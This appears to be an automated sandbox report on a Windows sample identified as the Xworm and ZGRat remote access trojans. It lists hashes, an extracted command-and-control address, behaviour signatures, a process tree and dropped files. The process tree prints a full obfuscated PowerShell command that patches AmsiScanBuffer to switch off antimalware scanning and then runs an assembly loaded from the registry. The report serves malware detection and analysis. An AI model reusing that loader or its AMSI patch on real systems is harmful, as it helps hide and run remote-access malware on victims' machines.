Analysis
-
max time kernel
85s -
max time network
67s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
-
submitted
07-04-2024 07:31
General
-
Target
f267a71692c3683e3d6d0461e003f54f.exe
-
Size
2.3MB
-
MD5
f267a71692c3683e3d6d0461e003f54f
-
SHA1
189450a513d1f2412470eb965468f1324633d252
-
SHA256
74531f459fdb6837669583dc731b7a6afad5378782ab8bca5d726edac753f251
-
SHA512
b376166646548104ee092beba9af8af5a04695f828e1a1b21ccdfd8a1cb88347a40f31108066d0fe6176a5ce18bf3ef3b8ce4e82a6c6a6ee886efe2bfa7a7bd7
-
SSDEEP
49152:qjOIzFMNQnXmsIi7MS4bdotKHDG/GGcYsKYX78Y5Ye3:qjvzFMNQnWspj4bdot45GdsKYXl5Yo
Score
10/10
Malware Config
Extracted
Family
xworm
Version
3.1
C2
gamemodz.duckdns.org:6969
Attributes
-
Install_directory
%AppData%
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 1 IoCs
-
Detect ZGRat V1 34 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
Xworm
Xworm is a remote access trojan written in C#.
-
ZGRat
ZGRat is remote access trojan written in C#.
-
Executes dropped EXE 2 IoCs
-
Drops file in System32 directory 2 IoCs
-
Suspicious use of SetThreadContext 3 IoCs
-
Modifies data under HKEY_USERS 41 IoCs
-
Suspicious behavior: EnumeratesProcesses 7 IoCs
-
Suspicious use of AdjustPrivilegeToken 6 IoCs
-
Suspicious use of WriteProcessMemory 37 IoCs
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{88427d95-63fa-4fc6-8c14-5b52690474fa}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\f267a71692c3683e3d6d0461e003f54f.exe"C:\Users\Admin\AppData\Local\Temp\f267a71692c3683e3d6d0461e003f54f.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\$7769ca3c"C:\Users\Admin\AppData\Local\Temp\$7769ca3c"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\$772491e3"C:\Users\Admin\AppData\Local\Temp\$772491e3"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:uMSJiUFHvWMU{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$wFTWRPHIbdTenY,[Parameter(Position=1)][Type]$gCqMzkKFfo)$PPyHSvKlNSD=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('Re'+[Char](102)+''+[Char](108)+'e'+'c'+''+'t'+''+[Char](101)+'dDel'+'e'+''+[Char](103)+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'nM'+[Char](101)+''+[Char](109)+''+[Char](111)+''+[Char](114)+''+[Char](121)+'M'+'o'+''+[Char](100)+''+'u'+''+[Char](108)+''+'e'+'',$False).DefineType(''+[Char](77)+'yD'+'e'+''+[Char](108)+'e'+'g'+'a'+[Char](116)+'e'+'T'+''+[Char](121)+'p'+[Char](101)+'',''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+'Pu'+'b'+''+'l'+'ic'+[Char](44)+''+[Char](83)+''+[Char](101)+''+'a'+'l'+'e'+'d,'+'A'+''+[Char](110)+'s'+[Char](105)+''+[Char](67)+''+'l'+''+'a'+''+'s'+''+[Char](115)+''+','+''+[Char](65)+''+[Char](117)+''+[Char](116)+'o'+[Char](67)+''+'l'+''+'a'+''+[Char](115)+'s',[MulticastDelegate]);$PPyHSvKlNSD.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+'e'+[Char](99)+'i'+'a'+'lN'+'a'+''+[Char](109)+''+[Char](101)+','+[Char](72)+''+[Char](105)+'d'+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+'g'+''+[Char](44)+''+'P'+''+[Char](117)+''+'b'+'l'+'i'+''+'c'+'',[Reflection.CallingConventions]::Standard,$wFTWRPHIbdTenY).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+[Char](116)+''+'i'+''+'m'+'e'+[Char](44)+''+[Char](77)+''+'a'+'n'+[Char](97)+''+'g'+'e'+'d'+'');$PPyHSvKlNSD.DefineMethod(''+[Char](73)+''+'n'+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'','P'+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+[Char](72)+'i'+[Char](100)+'e'+'B'+'ySi'+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+'w'+[Char](83)+''+[Char](108)+''+[Char](111)+''+[Char](116)+','+[Char](86)+''+'i'+''+'r'+''+[Char](116)+''+[Char](117)+'al',$gCqMzkKFfo,$wFTWRPHIbdTenY).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+'t'+''+[Char](105)+'m'+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+''+'e'+'d');Write-Output $PPyHSvKlNSD.CreateType();}$atNXCJvhUpBbW=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+'s'+''+[Char](116)+''+'e'+''+'m'+''+'.'+''+[Char](100)+''+'l'+'l')}).GetType(''+'M'+'i'+[Char](99)+''+[Char](114)+''+'o'+''+'s'+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+'W'+''+[Char](105)+''+'n'+''+'3'+''+'2'+'.'+'U'+'n'+[Char](115)+''+'a'+'f'+'e'+''+[Char](78)+''+[Char](97)+''+'t'+''+[Char](105)+''+[Char](118)+''+'e'+'Me'+[Char](116)+''+'h'+'o'+[Char](100)+''+[Char](115)+'');$SuZmZcowxWuovm=$atNXCJvhUpBbW.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+[Char](80)+''+[Char](114)+''+'o'+''+[Char](99)+''+[Char](65)+''+[Char](100)+''+[Char](100)+'r'+[Char](101)+'ss',[Reflection.BindingFlags](''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+'S'+[Char](116)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$AlWPwmAxDmhlqyxPgfM=uMSJiUFHvWMU @([String])([IntPtr]);$lHaaLxJufJRFjdkUTVOzIp=uMSJiUFHvWMU @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$XHFiHrNKEXh=$atNXCJvhUpBbW.GetMethod(''+'G'+''+'e'+''+[Char](116)+''+'M'+''+[Char](111)+'d'+'u'+''+'l'+''+[Char](101)+''+'H'+''+[Char](97)+''+'n'+''+'d'+'le').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+'rn'+[Char](101)+''+[Char](108)+''+[Char](51)+'2'+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$ouYoQwfXOmvvJy=$SuZmZcowxWuovm.Invoke($Null,@([Object]$XHFiHrNKEXh,[Object]('Lo'+[Char](97)+''+'d'+''+[Char](76)+'i'+[Char](98)+''+[Char](114)+''+[Char](97)+''+'r'+''+'y'+''+'A'+'')));$QjYfTyEcwZUAgfapJ=$SuZmZcowxWuovm.Invoke($Null,@([Object]$XHFiHrNKEXh,[Object](''+[Char](86)+''+'i'+''+[Char](114)+''+[Char](116)+'u'+'a'+''+'l'+''+[Char](80)+'r'+[Char](111)+''+[Char](116)+''+[Char](101)+'c'+[Char](116)+'')));$bijsmus=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ouYoQwfXOmvvJy,$AlWPwmAxDmhlqyxPgfM).Invoke('a'+[Char](109)+''+'s'+''+[Char](105)+''+[Char](46)+''+[Char](100)+''+'l'+''+'l'+'');$MXTMXQrTsNfIZRENT=$SuZmZcowxWuovm.Invoke($Null,@([Object]$bijsmus,[Object]('A'+[Char](109)+''+'s'+''+'i'+''+[Char](83)+''+[Char](99)+'a'+[Char](110)+''+[Char](66)+'u'+[Char](102)+'f'+'e'+''+[Char](114)+'')));$IyjeVwdIMp=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($QjYfTyEcwZUAgfapJ,$lHaaLxJufJRFjdkUTVOzIp).Invoke($MXTMXQrTsNfIZRENT,[uint32]8,4,[ref]$IyjeVwdIMp);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$MXTMXQrTsNfIZRENT,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($QjYfTyEcwZUAgfapJ,$lHaaLxJufJRFjdkUTVOzIp).Invoke($MXTMXQrTsNfIZRENT,[uint32]8,0x20,[ref]$IyjeVwdIMp);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+'F'+'T'+''+'W'+''+'A'+''+'R'+'E').GetValue(''+[Char](36)+''+[Char](55)+'7s'+'t'+''+[Char](97)+'g'+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.3MB
MD5f267a71692c3683e3d6d0461e003f54f
SHA1189450a513d1f2412470eb965468f1324633d252
SHA25674531f459fdb6837669583dc731b7a6afad5378782ab8bca5d726edac753f251
SHA512b376166646548104ee092beba9af8af5a04695f828e1a1b21ccdfd8a1cb88347a40f31108066d0fe6176a5ce18bf3ef3b8ce4e82a6c6a6ee886efe2bfa7a7bd7
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
148KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
624KB
-
Filesize
96KB
-
Filesize
7.7MB
-
Filesize
2.3MB
-
Filesize
7.7MB
-
Filesize
2.3MB
-
Filesize
2.3MB
-
Filesize
2.3MB
-
Filesize
2.3MB
-
Filesize
2.3MB
-
Filesize
2.3MB
-
Filesize
2.3MB
-
Filesize
2.3MB
-
Filesize
2.3MB
-
Filesize
2.3MB
-
Filesize
2.3MB
-
Filesize
2.3MB
-
Filesize
2.3MB
-
Filesize
2.3MB
-
Filesize
2.3MB
-
Filesize
2.3MB
-
Filesize
2.3MB
-
Filesize
2.3MB
-
Filesize
2.3MB
-
Filesize
7.7MB
-
Filesize
2.3MB
-
Filesize
2.3MB
-
Filesize
2.3MB
-
Filesize
2.3MB
-
Filesize
2.3MB
-
Filesize
2.3MB
-
Filesize
64KB
-
Filesize
4KB
-
Filesize
544KB
-
Filesize
304KB
-
Filesize
2.3MB
-
Filesize
2.4MB
-
Filesize
2.3MB
-
Filesize
7.7MB
-
Filesize
5.6MB
-
Filesize
2.3MB
-
Filesize
64KB
-
Filesize
584KB
-
Filesize
2.3MB
-
Filesize
2.3MB
-
Filesize
2.3MB
-
Filesize
2.3MB
-
Filesize
2.3MB
-
Filesize
336KB
-
Filesize
168KB
-
Filesize
10.8MB
-
Filesize
64KB
-
Filesize
136KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
10.8MB
-
Filesize
172KB